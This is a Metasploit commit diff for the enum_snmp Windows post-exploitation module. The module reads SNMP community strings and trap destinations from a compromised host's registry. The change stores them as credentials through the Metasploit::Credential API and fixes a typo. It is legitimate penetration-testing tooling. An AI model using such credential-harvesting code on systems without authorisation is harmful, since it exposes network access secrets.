Land rapid7#3692, @TomSellers's support for Metasploit Credential on enum_snmp

Author: jvazquez-r7

modules/post/windows/gather/enum_snmp.rb

@@ -50,7 +50,7 @@ def check_snmp
   def community_strings
     comm_str = []
     tbl = Rex::Ui::Text::Table.new(
-      'Header'  => "Comunity Strings",
+      'Header'  => "Community Strings",
       'Indent'  => 1,
       'Columns' =>
       [
@@ -63,33 +63,30 @@ def community_strings
     if not comm_str.nil? and not comm_str.empty?
       comm_str.each do |c|
 
+        # comm_type is for human display, access_type is passed to the credential
+        # code using labels consistent with the SNMP login scanner
         case registry_getvaldata(key,c)
         when 4
-          comm_type = "READ ONLY"
+          comm_type = 'READ ONLY'
+          access_type = 'read-only'
         when 1
-          comm_type = "DISABLED"
+          comm_type = 'DISABLED'
+          access_type = 'disabled'
         when 2
-          comm_type = "NOTIFY"
+          comm_type = 'NOTIFY'
+          access_type = 'notify'
         when 8
-          comm_type = "READ & WRITE"
+          comm_type = 'READ & WRITE'
+          access_type = 'read-write'
         when 16
-          comm_type = "READ CREATE"
+          comm_type = 'READ CREATE'
+          access_type = 'read-create'
         end
 
         # Save data to table
         tbl << [c,comm_type]
 
-        # Save Community Strings to DB
-        report_auth_info(
-          :host	=> session.sock.peerhost,
-          :port	=> 161,
-          :proto	=> 'udp',
-          :sname	=> 'snmp',
-          :user	=> '',
-          :pass	=> c,
-          :type	=> "snmp.community",
-          :duplicate_ok	=> true
-        )
+        register_creds(session.session_host, 161, '', c, 'snmp', access_type)
       end
       print_status("")
 
@@ -116,21 +113,13 @@ def trap_setup
     if not trap_hosts.nil? and not trap_hosts.empty?
       trap_hosts.each do |c|
         print_status("Community Name: #{c}")
-        session.framework.db.report_auth_info(
-          :host	=> session.sock.peerhost,
-          :port	=> 161,
-          :proto	=> 'udp',
-          :sname	=> 'snmp',
-          :user	=> '',
-          :pass	=> c,
-          :type	=> "snmp.community",
-          :duplicate_ok	=> true
-        )
+
         t_comm_key = key+"\\"+c
         registry_enumvals(t_comm_key).each do |t|
-          print_status("\tDestination: " + registry_getvaldata(t_comm_key,t))
+          trap_dest = registry_getvaldata(t_comm_key,t)
+          print_status("\tDestination: #{trap_dest}")
+          register_creds(trap_dest, 162, '', c, 'snmptrap', 'trap')
         end
-
       end
     else
       print_status("No Traps are configured")
@@ -152,4 +141,40 @@ def allowd_for_snmp_query
       print_status("\tCommunity Strings can be accessed from any host")
     end
   end
+
+  def register_creds(client_ip, client_port, user, pass, service_name, access_type)
+    # Build service information
+    service_data = {
+      address: client_ip,
+      port: client_port,
+      service_name: service_name,
+      protocol: 'udp',
+      workspace_id: myworkspace_id
+    }
+
+    # Build credential information
+    credential_data = {
+      access_level: access_type,
+      origin_type: :session,
+      session_id: session_db_id,
+      post_reference_name: self.refname,
+      private_data: pass,
+      private_type: :password,
+      username: user,
+      workspace_id: myworkspace_id
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      workspace_id: myworkspace_id
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
 end